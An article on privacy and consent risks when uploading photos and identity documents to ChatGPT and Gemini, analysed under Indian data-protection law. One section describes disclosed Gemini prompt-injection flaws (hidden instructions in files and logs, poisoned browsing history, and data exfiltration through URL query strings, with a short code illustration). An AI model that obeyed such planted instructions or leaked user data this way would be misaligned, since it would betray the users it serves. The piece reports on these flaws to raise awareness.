Digital Naivety: Uninformed Consent in the Age of Generative AI

Aali Jaiswal, Law


In the past few months, social media has been flooded with AI-fuelled trends. The list is long, but this article focuses on the Gemini Red Saree trend. People have been enthusiastically uploading their photos to ChatGPT and Gemini to transport themselves to exotic locations and to apply filters that look like professional edits. This follows a familiar pattern: the age-old habit of clicking “I Agree” whenever the option appears on screen. Beyond aesthetics, people also upload personal documents to make certain processes quick and hassle-free, or to avoid paying for professional help. These habits reveal widespread ignorance of digital safety, blind trust in AI, limited awareness of the governing laws, and the thin accountability of AI companies.

When AI Knew Too Much

For most people, a video by influencer Jhalak Bhawnani served as a wake-up call. In it, she described a “creepy” experience with Google Gemini: she uploaded a picture (which did not show her hand) to take part in the viral Red Saree trend, yet the AI-generated result included her left hand with a mole, in the exact spot where she actually has one. The incident sparked widespread curiosity and concern: how did the model know that?

The policies of Google Gemini (which can be found here, here, here and here) read:

“We also collect the content you create, upload, or receive from others when using our services. This includes… photos and videos you save.”

“This license allows Google to host, reproduce, distribute… modify and create derivative works based on your content.”

This means that users retain ownership but grant the company a broad license for ‘service improvement’. On the same point, the policies of OpenAI and ChatGPT (which can be found here and here) read:

“We collect Personal Data that you provide in the input… including… images.”

“We may use the Content you provide us to improve our Services, for example, to train the models.”

OpenAI does, however, offer an opt-out from model training.

Generative AI and Vulnerabilities

In September 2025, Tenable researchers disclosed three vulnerabilities in Gemini. In the first, an attacker could upload a malicious PDF or text file containing hidden instructions, which Gemini would interpret and use to exfiltrate users’ saved prompts or emails. When Gemini Cloud Assist processed and summarised these logs, it treated the malicious content as trusted commands, potentially compromising cloud services or generating phishing links.

The second vulnerability was an injection via search personalisation. Attackers could insert malicious queries into a victim’s Chrome browsing history; when Gemini used this history to personalise searches, it would interpret the injected entries as legitimate user input. Attackers could then use this to leak sensitive information such as saved data and location history.

And the third was data exfiltration via rendered output. This vulnerability allowed an attacker to trick Gemini into making covert outbound HTTP requests to an attacker-controlled server, smuggling sensitive user data out by embedding it in the URL’s query string.
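To see why query-string exfiltration works, consider a minimal sketch (the domain and field names below are invented for illustration): any value appended to a URL’s query string is delivered to whoever operates the destination server, who only needs to read their own access logs.

```python
from urllib.parse import urlencode, urlparse, parse_qs

# Hypothetical illustration: data smuggled into a URL's query string
# reaches whoever controls the destination server. The domain and
# field names are made up for this sketch.
stolen = {"loc": "28.6139,77.2090", "note": "saved-address"}
url = "https://attacker.example/collect?" + urlencode(stolen)

# The "attacker" simply decodes the query string their server received:
received = parse_qs(urlparse(url).query)
print(received["loc"][0])  # the exfiltrated value arrives intact
```

This is why a model that can be tricked into rendering or fetching an attacker-supplied URL effectively has a covert data channel, even without any traditional “hack” of its servers.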

OpenAI’s ChatGPT has also seen several data leaks. In March 2023, a bug in an open-source library exposed users’ chat histories and some personal information. More recently, Google indexed shared chat links, making some conversations publicly searchable. There have also been incidents in which users reported seeing others’ chat histories; OpenAI attributed these to compromised accounts rather than a platform-wide leak.

In India, regulators issued only post-incident advisories on AI safety; no lawsuits or compensation claims were reported from Indian users, and OpenAI’s self-reporting was global, with no India-specific action.

Illusion of Consent

The policies of these platforms render Indian law practically unenforceable. Both ChatGPT and Gemini require users to grant worldwide, non-exclusive, royalty-free licenses to reproduce, modify, distribute, and create derivative works from any uploaded content. Under these policies, once uploaded, your data can be used indefinitely for AI model training, even if you delete it. This violates Section 5 (purpose limitation) of the Digital Personal Data Protection Act, 2023: your consent was limited to ‘editing a photo’, not to having your face or ID train global AI systems. Your Aadhaar photo, for example, could surface in deepfakes or synthetic IDs in future outputs, and the process is irreversible, even if you later withdraw consent.

Uploading a tax return or legal document means your personal financial or legal details become part of the AI’s knowledge base and could potentially be reproduced in future responses to others. OpenAI’s policy states, “We may use Content… to train the models that power ChatGPT” unless you opt out. Similarly, Google’s Gemini policy states, “Google uses your activity… to train generative AI models.”

This is not “free, specific, informed, unconditional and unambiguous” consent as required by Section 6(1) of the DPDP Act. Opting out also reduces functionality (ChatGPT, for example, limits features), effectively coercing consent.

More Risks

AI systems can edit, replicate, or generate fake versions of Aadhaar cards, PAN cards, and bank statements, and these can be actively used in fraud. Past breaches, including the 2023 ChatGPT incident and the 2025 Gemini disclosures, demonstrate that such leaks are a real concern. The policies do not specifically prohibit uploading such documents, which could facilitate offences under Sections 66C (identity theft) and 66D (cheating by personation) of the Information Technology Act, 2000.

Reading the policies carefully, we realise that “Delete” does not mean deleted from the AI models. ChatGPT keeps temporary chats for 30 days and human-reviewed chats for 3 years; Gemini likewise retains human-reviewed chats for up to 3 years. Even if you delete your account, your data remains in their training datasets. This practice is non-compliant with Section 12 of the DPDP Act, which mandates erasure upon withdrawal of consent.

A greater risk is that the data is stored outside India. Both OpenAI and Google process data on US servers and promise only “commercially reasonable” protections. US storage means Indian authorities cannot enforce access or deletion, and in a breach, Indian users would have no direct legal remedy under US law.

If your data is leaked or used in fraud and you suffer financial loss and legal costs, the policies cap your compensation at USD 100 (OpenAI) or USD 200 (Google). There is no meaningful remedy, and such caps may in any case be void under Indian contract law as unfair terms.

Conclusion: Practical steps to stay safe while using AI tools

To avoid the legal problems discussed above, you should never type in or upload documents such as an Aadhaar card, PAN card, passport, bank statement, credit card statement, salary slip, or legal drafts containing personal information. If it is unavoidable, use dummy data by changing the numbers, blur faces, or type only the question and ask how to do the task yourself, for example, “How do I file ITR-3?”.
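As a rough illustration of the “dummy data” advice, here is a small sketch (the regexes and helper name are mine, not from any official tool) that masks strings shaped like Aadhaar and PAN numbers before text is pasted into a chatbot. A real document needs more careful human review than a regex can give.

```python
import re

# Illustrative redaction helper (hypothetical, not an official tool):
# Aadhaar numbers are 12 digits, often written in space-separated
# groups of four; PAN numbers are 5 letters, 4 digits, 1 letter.
AADHAAR = re.compile(r"\b\d{4}\s?\d{4}\s?\d{4}\b")
PAN = re.compile(r"\b[A-Z]{5}\d{4}[A-Z]\b")

def redact(text: str) -> str:
    """Replace Aadhaar- and PAN-shaped strings with placeholders."""
    text = AADHAAR.sub("XXXX XXXX XXXX", text)
    return PAN.sub("XXXXX0000X", text)

print(redact("Aadhaar 1234 5678 9012, PAN ABCDE1234F"))
# → Aadhaar XXXX XXXX XXXX, PAN XXXXX0000X
```

Running such a filter locally, before anything leaves your machine, keeps the original identifiers out of the provider’s logs and training data entirely.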

You can also change the basic settings to turn off training: in ChatGPT, go to Settings → Data controls and switch “Improve the model” off; in Gemini, go to Activity controls and switch Gemini Apps Activity off. Alternatively, use a temporary mode. In ChatGPT: “New chat” → the three dots → “Temporary chat”; in Gemini: “New chat” → “Turn off memory”. This way, the data is auto-deleted within 30 days and is never used for training.

Often, you cannot even guess the dangers of uploading something or revealing information about yourself, so it is better never to reveal anything specific and never to upload your face. Instagram trends will come and go, but these platforms will remember your face forever. The easiest mantra to follow is:

If you won’t share it with a stranger on WhatsApp, don’t share it with your AI ‘friend’ either.